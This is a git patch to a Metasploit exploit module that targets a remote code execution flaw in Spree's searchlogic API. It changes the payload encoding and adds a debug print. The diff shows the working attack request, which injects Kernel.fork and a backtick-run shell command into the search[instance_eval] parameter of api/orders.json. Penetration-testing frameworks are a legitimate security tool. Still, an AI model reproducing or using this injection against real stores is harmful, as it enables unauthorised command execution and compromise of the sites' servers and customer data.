From 064255e910b23d40c812d4ee3a8760117a5fcc63 Mon Sep 17 00:00:00 2001 From: Jonathan Cran Date: Sat, 17 Sep 2011 17:48:51 +0000 Subject: [PATCH] fixup the payload encoding, per joernchen's comment in the #metasploit channel. git-svn-id: file:///home/svn/framework3/trunk@13747 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/multi/http/spree_searchlogic_exec.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 9ef8a06d50..dd0ca9e310 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -59,7 +59,10 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - command = Rex::Text.uri_encode(payload.encoded) + command = Rex::Text.uri_encode(payload.raw, 'hex-all') + + puts command + urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end" res = send_request_raw({ 'uri' => urlconfigdir,